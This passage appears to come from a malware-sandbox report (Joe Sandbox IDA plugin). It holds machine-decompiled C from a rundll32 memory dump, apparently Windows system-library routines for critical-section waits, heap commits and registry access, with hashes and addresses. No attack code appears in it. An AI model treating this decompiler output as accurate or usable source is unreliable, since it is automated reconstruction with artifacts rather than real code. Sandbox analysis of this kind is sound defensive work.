                                                                                                                										__eflags = _t64[0x240] & 0x00000004;
                                                                                                                										if((_t64[0x240] & 0x00000004) != 0) {
                                                                                                                											_t78 = E04427D50();
                                                                                                                											__eflags = _t78;
                                                                                                                											if(_t78 == 0) {
                                                                                                                												_t64 = 0x7ffe0385;
                                                                                                                											} else {
                                                                                                                												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                                                                                                											}
                                                                                                                											__eflags =  *_t64 & 0x00000020;
                                                                                                                											if(( *_t64 & 0x00000020) != 0) {
                                                                                                                												_t64 = E04487016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                                                                                                											}
                                                                                                                										}
                                                                                                                									}
                                                                                                                								}
                                                                                                                								return _t64;
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_t97 = _t88;
                                                                                                                						_t93 = _t109;
                                                                                                                						E0449FDDA(_t97, _v12);
                                                                                                                						_t105 =  *_t109;
                                                                                                                						_t67 = _v12 + 1;
                                                                                                                						_v12 = _t67;
                                                                                                                						__eflags = _t105 - 0xffffffff;
                                                                                                                						if(_t105 == 0xffffffff) {
                                                                                                                							_t106 = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							_t106 =  *(_t105 + 0x14);
                                                                                                                						}
                                                                                                                						__eflags = _t67 - 2;
                                                                                                                						if(_t67 > 2) {
                                                                                                                							__eflags = _t109 - 0x44f5350;
                                                                                                                							if(_t109 != 0x44f5350) {
                                                                                                                								__eflags = _t106 - _v20;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									_t93 = _t109;
                                                                                                                									E0449FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                						_push("RTL: Re-Waiting\n");
                                                                                                                						_push(0);
                                                                                                                						_push(0x65);
                                                                                                                						_v20 = _t106;
                                                                                                                						E04495720();
                                                                                                                						_t104 = _v28;
                                                                                                                						_t116 = _t116 + 0xc;
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}




































                                                                                                                0x04402e8d
                                                                                                                0x04402e92
                                                                                                                0x04402e92
                                                                                                                0x04402e85
                                                                                                                0x04402df1
                                                                                                                0x04402df7
                                                                                                                0x04402df9
                                                                                                                0x04402df9
                                                                                                                0x04402dfc
                                                                                                                0x04402dff
                                                                                                                0x04402e02
                                                                                                                0x00000000
                                                                                                                0x04402e05
                                                                                                                0x04402e0c
                                                                                                                0x0445f9d9
                                                                                                                0x04402e12
                                                                                                                0x04402e12
                                                                                                                0x04402e12
                                                                                                                0x04402e1a
                                                                                                                0x0445f9e3
                                                                                                                0x0445f9e9
                                                                                                                0x0445f9f0
                                                                                                                0x0445f9f6
                                                                                                                0x0445f9f8
                                                                                                                0x0445f9f8
                                                                                                                0x0445f9f0
                                                                                                                0x04402e23
                                                                                                                0x0445fa02
                                                                                                                0x0445fa03
                                                                                                                0x0445fa05
                                                                                                                0x0445fa06
                                                                                                                0x00000000
                                                                                                                0x04402e29
                                                                                                                0x04402e29
                                                                                                                0x04402e2e
                                                                                                                0x04402e34
                                                                                                                0x04402e3e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e44
                                                                                                                0x04402e47
                                                                                                                0x04402e4d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e4f
                                                                                                                0x04402e54
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x04402e5a
                                                                                                                0x04402e5f
                                                                                                                0x04402e9a
                                                                                                                0x04402ea4
                                                                                                                0x04402ea5
                                                                                                                0x04402ea8
                                                                                                                0x04402eaf
                                                                                                                0x04402eb2
                                                                                                                0x04402eb5
                                                                                                                0x0445fae9
                                                                                                                0x0445faeb
                                                                                                                0x0445faed
                                                                                                                0x0445faef
                                                                                                                0x0445faf7
                                                                                                                0x0445faf8
                                                                                                                0x0445fafd
                                                                                                                0x0445faff
                                                                                                                0x0445fb04
                                                                                                                0x0445fb04
                                                                                                                0x0445faff
                                                                                                                0x04402ec0
                                                                                                                0x04402ec4
                                                                                                                0x04402ec6
                                                                                                                0x04402ec8
                                                                                                                0x0445fb14
                                                                                                                0x0445fb18
                                                                                                                0x0445fb1e
                                                                                                                0x0445fb21
                                                                                                                0x0445fb21
                                                                                                                0x04402ece
                                                                                                                0x04402ece
                                                                                                                0x04402ece
                                                                                                                0x04402ed7
                                                                                                                0x04402e61
                                                                                                                0x04402e63
                                                                                                                0x0445fa6b
                                                                                                                0x0445fa71
                                                                                                                0x0445fa76
                                                                                                                0x0445fa78
                                                                                                                0x0445fa8a
                                                                                                                0x0445fa7a
                                                                                                                0x0445fa83
                                                                                                                0x0445fa83
                                                                                                                0x0445fa8f
                                                                                                                0x0445fa91
                                                                                                                0x0445fa97
                                                                                                                0x0445fa9d
                                                                                                                0x0445faa4
                                                                                                                0x0445faaa
                                                                                                                0x0445faaf
                                                                                                                0x0445fab1
                                                                                                                0x0445fac3
                                                                                                                0x0445fab3
                                                                                                                0x0445fabc
                                                                                                                0x0445fabc
                                                                                                                0x0445fac8
                                                                                                                0x0445facb
                                                                                                                0x0445fadf
                                                                                                                0x0445fadf
                                                                                                                0x0445facb
                                                                                                                0x0445faa4
                                                                                                                0x0445fa91
                                                                                                                0x04402e6f
                                                                                                                0x04402e6f
                                                                                                                0x04402e5f
                                                                                                                0x0445fa13
                                                                                                                0x0445fa15
                                                                                                                0x0445fa17
                                                                                                                0x0445fa1f
                                                                                                                0x0445fa21
                                                                                                                0x0445fa22
                                                                                                                0x0445fa25
                                                                                                                0x0445fa28
                                                                                                                0x0445fa2f
                                                                                                                0x0445fa2f
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa2a
                                                                                                                0x0445fa31
                                                                                                                0x0445fa34
                                                                                                                0x0445fa36
                                                                                                                0x0445fa3c
                                                                                                                0x0445fa3e
                                                                                                                0x0445fa41
                                                                                                                0x0445fa43
                                                                                                                0x0445fa45
                                                                                                                0x0445fa45
                                                                                                                0x0445fa41
                                                                                                                0x0445fa3c
                                                                                                                0x0445fa4a
                                                                                                                0x0445fa4f
                                                                                                                0x0445fa51
                                                                                                                0x0445fa53
                                                                                                                0x0445fa56
                                                                                                                0x0445fa5b
                                                                                                                0x0445fa5e
                                                                                                                0x00000000
                                                                                                                0x0445fa5e
                                                                                                                0x04402e23

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: RTL: Re-Waiting
                                                                                                                • API String ID: 0-316354757
                                                                                                                • Opcode ID: 2c8740eacd8fc9b4f7946bf860ae98b9dd087afed25bb735f89e2bb2a7eb585a
                                                                                                                • Instruction ID: d3bcfe16318bdddedb9b4943f940dabdbb69aa68e89eecf00eea717c3428d0fe
                                                                                                                • Opcode Fuzzy Hash: 2c8740eacd8fc9b4f7946bf860ae98b9dd087afed25bb735f89e2bb2a7eb585a
                                                                                                                • Instruction Fuzzy Hash: 9461F071A00604ABEF31DF68C848B6FB7A5FB44718F1442ABE811973D2D7B4BD059792
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E044D0EA5(void* __ecx, void* __edx) {
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				unsigned int _v32;
                                                                                                                				signed int _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				char _v44;
                                                                                                                				intOrPtr _v64;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				signed int _t58;
                                                                                                                				unsigned int _t60;
                                                                                                                				intOrPtr _t62;
                                                                                                                				char* _t67;
                                                                                                                				char* _t69;
                                                                                                                				void* _t80;
                                                                                                                				void* _t83;
                                                                                                                				intOrPtr _t93;
                                                                                                                				intOrPtr _t115;
                                                                                                                				char _t117;
                                                                                                                				void* _t120;
                                                                                                                
                                                                                                                				_t83 = __edx;
                                                                                                                				_t117 = 0;
                                                                                                                				_t120 = __ecx;
                                                                                                                				_v44 = 0;
                                                                                                                				if(E044CFF69(__ecx,  &_v44,  &_v32) < 0) {
                                                                                                                					L24:
                                                                                                                					_t109 = _v44;
                                                                                                                					if(_v44 != 0) {
                                                                                                                						E044D1074(_t83, _t120, _t109, _t117, _t117);
                                                                                                                					}
                                                                                                                					L26:
                                                                                                                					return _t117;
                                                                                                                				}
                                                                                                                				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                                                                                                				_t5 = _t83 + 1; // 0x1
                                                                                                                				_v36 = _t5 << 0xc;
                                                                                                                				_v40 = _t93;
                                                                                                                				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                                                                                                				asm("sbb ebx, ebx");
                                                                                                                				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                                                                                                				if(_t58 != 0) {
                                                                                                                					_push(0);
                                                                                                                					_push(0x14);
                                                                                                                					_push( &_v24);
                                                                                                                					_push(3);
                                                                                                                					_push(_t93);
                                                                                                                					_push(0xffffffff);
                                                                                                                					_t80 = E04449730();
                                                                                                                					_t115 = _v64;
                                                                                                                					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                                                                                                						_push(_t93);
                                                                                                                						E044CA80D(_t115, 1, _v20, _t117);
                                                                                                                						_t83 = 4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				if(E044CA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                                                                                                					goto L24;
                                                                                                                				}
                                                                                                                				_t60 = _v32;
                                                                                                                				_t97 = (_t60 != 0x100000) + 1;
                                                                                                                				_t83 = (_v44 -  *0x44f8b04 >> 0x14) + (_v44 -  *0x44f8b04 >> 0x14);
                                                                                                                				_v28 = (_t60 != 0x100000) + 1;
                                                                                                                				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                                                                                                				_v40 = _t62;
                                                                                                                				if(_t83 >= _t62) {
                                                                                                                					L10:
                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                					asm("lock xadd [eax], ecx");
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t67 = 0x7ffe0380;
                                                                                                                					} else {
                                                                                                                						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                					}
                                                                                                                					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                						E044C138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                                                                                                					}
                                                                                                                					if(E04427D50() == 0) {
                                                                                                                						_t69 = 0x7ffe0388;
                                                                                                                					} else {
                                                                                                                						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                                                					}
                                                                                                                					if( *_t69 != 0) {
                                                                                                                						E044BFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                                                                                                					}
                                                                                                                					if(( *0x44f8724 & 0x00000008) != 0) {
                                                                                                                						E044C52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                                                                                                					}
                                                                                                                					_t117 = _v44;
                                                                                                                					goto L26;
                                                                                                                				}
                                                                                                                				while(E044D15B5(0x44f8ae4, _t83, _t97, _t97) >= 0) {
                                                                                                                					_t97 = _v28;
                                                                                                                					_t83 = _t83 + 2;
                                                                                                                					if(_t83 < _v40) {
                                                                                                                						continue;
                                                                                                                					}
                                                                                                                					goto L10;
                                                                                                                				}
                                                                                                                				goto L24;
                                                                                                                			}

























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: fd919cae8d88e08e3aea9dea64cf063275a36fd713692b4983bb124c4823401c
                                                                                                                • Instruction ID: c15c400b366ad36f5c4d98d76865a3713213ae581bf8820a2256515801adb283
                                                                                                                • Opcode Fuzzy Hash: fd919cae8d88e08e3aea9dea64cf063275a36fd713692b4983bb124c4823401c
                                                                                                                • Instruction Fuzzy Hash: E051DF702083419FEB25EF29D994B1BB7E5EBC4308F14492EF98697691D770F806CB62
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 76%
                                                                                                                			E0443F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                                                                                                				intOrPtr _v8;
                                                                                                                				intOrPtr _v12;
                                                                                                                				intOrPtr _v16;
                                                                                                                				char* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char _v28;
                                                                                                                				intOrPtr _v32;
                                                                                                                				char _v36;
                                                                                                                				char _v44;
                                                                                                                				char _v52;
                                                                                                                				intOrPtr _v56;
                                                                                                                				char _v60;
                                                                                                                				intOrPtr _v72;
                                                                                                                				void* _t51;
                                                                                                                				void* _t58;
                                                                                                                				signed short _t82;
                                                                                                                				short _t84;
                                                                                                                				signed int _t91;
                                                                                                                				signed int _t100;
                                                                                                                				signed short* _t103;
                                                                                                                				void* _t108;
                                                                                                                				intOrPtr* _t109;
                                                                                                                
                                                                                                                				_t103 = __ecx;
                                                                                                                				_t82 = __edx;
                                                                                                                				_t51 = E04424120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                                                                                                				if(_t51 >= 0) {
                                                                                                                					_push(0x21);
                                                                                                                					_push(3);
                                                                                                                					_v56 =  *0x7ffe02dc;
                                                                                                                					_v20 =  &_v52;
                                                                                                                					_push( &_v44);
                                                                                                                					_v28 = 0x18;
                                                                                                                					_push( &_v28);
                                                                                                                					_push(0x100020);
                                                                                                                					_v24 = 0;
                                                                                                                					_push( &_v60);
                                                                                                                					_v16 = 0x40;
                                                                                                                					_v12 = 0;
                                                                                                                					_v8 = 0;
                                                                                                                					_t58 = E04449830();
                                                                                                                					_t87 =  *[fs:0x30];
                                                                                                                					_t108 = _t58;
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                                                                                                					if(_t108 < 0) {
                                                                                                                						L11:
                                                                                                                						_t51 = _t108;
                                                                                                                					} else {
                                                                                                                						_push(4);
                                                                                                                						_push(8);
                                                                                                                						_push( &_v36);
                                                                                                                						_push( &_v44);
                                                                                                                						_push(_v60);
                                                                                                                						_t108 = E04449990();
                                                                                                                						if(_t108 < 0) {
                                                                                                                							L10:
                                                                                                                							_push(_v60);
                                                                                                                							E044495D0();
                                                                                                                							goto L11;
                                                                                                                						} else {
                                                                                                                							_t18 = _t82 + 0x18; // 0x352bd01a
                                                                                                                							_t109 = L04424620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                                                							if(_t109 == 0) {
                                                                                                                								_t108 = 0xc0000017;
                                                                                                                								goto L10;
                                                                                                                							} else {
                                                                                                                								_t21 = _t109 + 0x18; // 0x18
                                                                                                                								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                                                                                                								 *_t109 = 1;
                                                                                                                								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                                                                                                								 *(_t109 + 0xe) = _t82;
                                                                                                                								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                                                                                                								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                                                                                                								_t29 =  &(_t103[2]); // 0x2000352b
                                                                                                                								E0444F3E0(_t21,  *_t29,  *_t103 & 0x0000ffff);
                                                                                                                								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                								 *((short*)(_t109 + 0xc)) =  *_t103;
                                                                                                                								_t91 =  *_t103 & 0x0000ffff;
                                                                                                                								_t34 =  &(_t103[2]); // 0x2000352b
                                                                                                                								_t100 = _t91 & 0xfffffffe;
                                                                                                                								_t84 = 0x5c;
                                                                                                                								if( *((intOrPtr*)( *_t34 + _t100 - 2)) != _t84) {
                                                                                                                									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                                                                                                										_push(_v60);
                                                                                                                										E044495D0();
                                                                                                                										L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                                                                                                										_t51 = 0xc0000106;
                                                                                                                									} else {
                                                                                                                										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                                                                                                										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                                                                                                										goto L5;
                                                                                                                									}
                                                                                                                								} else {
                                                                                                                									L5:
                                                                                                                									 *_a4 = _t109;
                                                                                                                									_t51 = 0;
                                                                                                                								}
                                                                                                                							}
                                                                                                                						}
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t51;
                                                                                                                			}


























                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: @
                                                                                                                • API String ID: 0-2766056989
                                                                                                                • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction ID: c0c64264a61e68ec567395d7133df1a8b89dc9e2b132cb017cb18b5337c96ad0
                                                                                                                • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                                • Instruction Fuzzy Hash: F65190715047109FD720DF29C840A67BBF4FF88714F008A2EF99597650E7B4E905CB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 75%
                                                                                                                			E04483540(intOrPtr _a4) {
                                                                                                                				signed int _v12;
                                                                                                                				intOrPtr _v88;
                                                                                                                				intOrPtr _v92;
                                                                                                                				char _v96;
                                                                                                                				char _v352;
                                                                                                                				char _v1072;
                                                                                                                				intOrPtr _v1140;
                                                                                                                				intOrPtr _v1148;
                                                                                                                				char _v1152;
                                                                                                                				char _v1156;
                                                                                                                				char _v1160;
                                                                                                                				char _v1164;
                                                                                                                				char _v1168;
                                                                                                                				char* _v1172;
                                                                                                                				short _v1174;
                                                                                                                				char _v1176;
                                                                                                                				char _v1180;
                                                                                                                				char _v1192;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				short _t41;
                                                                                                                				short _t42;
                                                                                                                				intOrPtr _t80;
                                                                                                                				intOrPtr _t81;
                                                                                                                				signed int _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				_v12 =  *0x44fd360 ^ _t82;
                                                                                                                				_t41 = 0x14;
                                                                                                                				_v1176 = _t41;
                                                                                                                				_t42 = 0x16;
                                                                                                                				_v1174 = _t42;
                                                                                                                				_v1164 = 0x100;
                                                                                                                				_v1172 = L"BinaryHash";
                                                                                                                				_t81 = E04440BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                                                                                                				if(_t81 < 0) {
                                                                                                                					L11:
                                                                                                                					_t75 = _t81;
                                                                                                                					E04483706(0, _t81, _t79, _t80);
                                                                                                                					L12:
                                                                                                                					if(_a4 != 0xc000047f) {
                                                                                                                						E0444FA60( &_v1152, 0, 0x50);
                                                                                                                						_v1152 = 0x60c201e;
                                                                                                                						_v1148 = 1;
                                                                                                                						_v1140 = E04483540;
                                                                                                                						E0444FA60( &_v1072, 0, 0x2cc);
                                                                                                                						_push( &_v1072);
                                                                                                                						E0445DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                                                                                                						E04490C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                                                                                                						_push(_v1152);
                                                                                                                						_push(0xffffffff);
                                                                                                                						E044497C0();
                                                                                                                					}
                                                                                                                					return E0444B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                                                                                                				}
                                                                                                                				_t79 =  &_v352;
                                                                                                                				_t81 = E04483971(0, _a4,  &_v352,  &_v1156);
                                                                                                                				if(_t81 < 0) {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                				_t75 = _v1156;
                                                                                                                				_t79 =  &_v1160;
                                                                                                                				_t81 = E04483884(_v1156,  &_v1160,  &_v1168);
                                                                                                                				if(_t81 >= 0) {
                                                                                                                					_t80 = _v1160;
                                                                                                                					E0444FA60( &_v96, 0, 0x50);
                                                                                                                					_t83 = _t83 + 0xc;
                                                                                                                					_push( &_v1180);
                                                                                                                					_push(0x50);
                                                                                                                					_push( &_v96);
                                                                                                                					_push(2);
                                                                                                                					_push( &_v1176);
                                                                                                                					_push(_v1156);
                                                                                                                					_t81 = E04449650();
                                                                                                                					if(_t81 >= 0) {
                                                                                                                						if(_v92 != 3 || _v88 == 0) {
                                                                                                                							_t81 = 0xc000090b;
                                                                                                                						}
                                                                                                                						if(_t81 >= 0) {
                                                                                                                							_t75 = _a4;
                                                                                                                							_t79 =  &_v352;
                                                                                                                							E04483787(_a4,  &_v352, _t80);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					L044277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                                                                                                				}
                                                                                                                				_push(_v1156);
                                                                                                                				E044495D0();
                                                                                                                				if(_t81 >= 0) {
                                                                                                                					goto L12;
                                                                                                                				} else {
                                                                                                                					goto L11;
                                                                                                                				}
                                                                                                                			}
































                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: BinaryHash
                                                                                                                • API String ID: 2994545307-2202222882
                                                                                                                • Opcode ID: 47cd58e89e340277e0e363e4712d1a780b6167c6fd960cf28b23d98087e52a5d
                                                                                                                • Instruction ID: 2acc639a022ae9c05a62139eccd9a69df0f007f782027b13639785ef35ff998b
                                                                                                                • Opcode Fuzzy Hash: 47cd58e89e340277e0e363e4712d1a780b6167c6fd960cf28b23d98087e52a5d
                                                                                                                • Instruction Fuzzy Hash: AD4126F1D0152C9BEF21EE55CC80F9EB77CAB44718F00459AEA09A7241DB31AE888F95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 71%
                                                                                                                			E044D05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                				signed int _v20;
                                                                                                                				char _v24;
                                                                                                                				signed int _v28;
                                                                                                                				char _v32;
                                                                                                                				signed int _v36;
                                                                                                                				intOrPtr _v40;
                                                                                                                				void* __ebx;
                                                                                                                				void* _t35;
                                                                                                                				signed int _t42;
                                                                                                                				char* _t48;
                                                                                                                				signed int _t59;
                                                                                                                				signed char _t61;
                                                                                                                				signed int* _t79;
                                                                                                                				void* _t88;
                                                                                                                
                                                                                                                				_v28 = __edx;
                                                                                                                				_t79 = __ecx;
                                                                                                                				if(E044D07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                                                                                                					L13:
                                                                                                                					_t35 = 0;
                                                                                                                					L14:
                                                                                                                					return _t35;
                                                                                                                				}
                                                                                                                				_t61 = __ecx[1];
                                                                                                                				_t59 = __ecx[0xf];
                                                                                                                				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                                                                                                				_v36 = _a8 << 0xc;
                                                                                                                				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                                                                                                				asm("sbb esi, esi");
                                                                                                                				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                                                                                                				if(_t42 != 0) {
                                                                                                                					_push(0);
                                                                                                                					_push(0x14);
                                                                                                                					_push( &_v24);
                                                                                                                					_push(3);
                                                                                                                					_push(_t59);
                                                                                                                					_push(0xffffffff);
                                                                                                                					if(E04449730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                                                                                                						_push(_t61);
                                                                                                                						E044CA80D(_t59, 1, _v20, 0);
                                                                                                                						_t88 = 4;
                                                                                                                					}
                                                                                                                				}
                                                                                                                				_t35 = E044CA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                                                                                                				if(_t35 < 0) {
                                                                                                                					goto L14;
                                                                                                                				}
                                                                                                                				E044D1293(_t79, _v40, E044D07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                                                                                                				if(E04427D50() == 0) {
                                                                                                                					_t48 = 0x7ffe0380;
                                                                                                                				} else {
                                                                                                                					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                                                                                                				}
                                                                                                                				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                                                                                                					E044C138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                                                                                                				}
                                                                                                                				goto L13;
                                                                                                                			}


















                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: `
                                                                                                                • API String ID: 0-2679148245
                                                                                                                • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction ID: 6fa5338b4a5c351f5c97fce2513269f4acb60d00149c7aab3637c4ca242cff0f
                                                                                                                • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                                                                                                • Instruction Fuzzy Hash: C631B132604345ABEB20DE25CD95F9B77D9ABC4758F04422AF958AB281E670F904CBA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 78%
                                                                                                                			E0443A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                				intOrPtr _t35;
                                                                                                                				intOrPtr _t39;
                                                                                                                				intOrPtr _t45;
                                                                                                                				intOrPtr* _t51;
                                                                                                                				intOrPtr* _t52;
                                                                                                                				intOrPtr* _t55;
                                                                                                                				signed int _t57;
                                                                                                                				intOrPtr* _t59;
                                                                                                                				intOrPtr _t68;
                                                                                                                				intOrPtr* _t77;
                                                                                                                				void* _t79;
                                                                                                                				signed int _t80;
                                                                                                                				intOrPtr _t81;
                                                                                                                				char* _t82;
                                                                                                                				void* _t83;
                                                                                                                
                                                                                                                				_push(0x24);
                                                                                                                				_push(0x44e0220);
                                                                                                                				E0445D08C(__ebx, __edi, __esi);
                                                                                                                				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                                                                                				_t79 = __ecx;
                                                                                                                				_t35 =  *0x44f7b9c; // 0x0
                                                                                                                				_t55 = L04424620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                                                                                				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                                                                                				if(_t55 == 0) {
                                                                                                                					_t39 = 0xc0000017;
                                                                                                                					L11:
                                                                                                                					return E0445D0D1(_t39);
                                                                                                                				}
                                                                                                                				_t68 = 0;
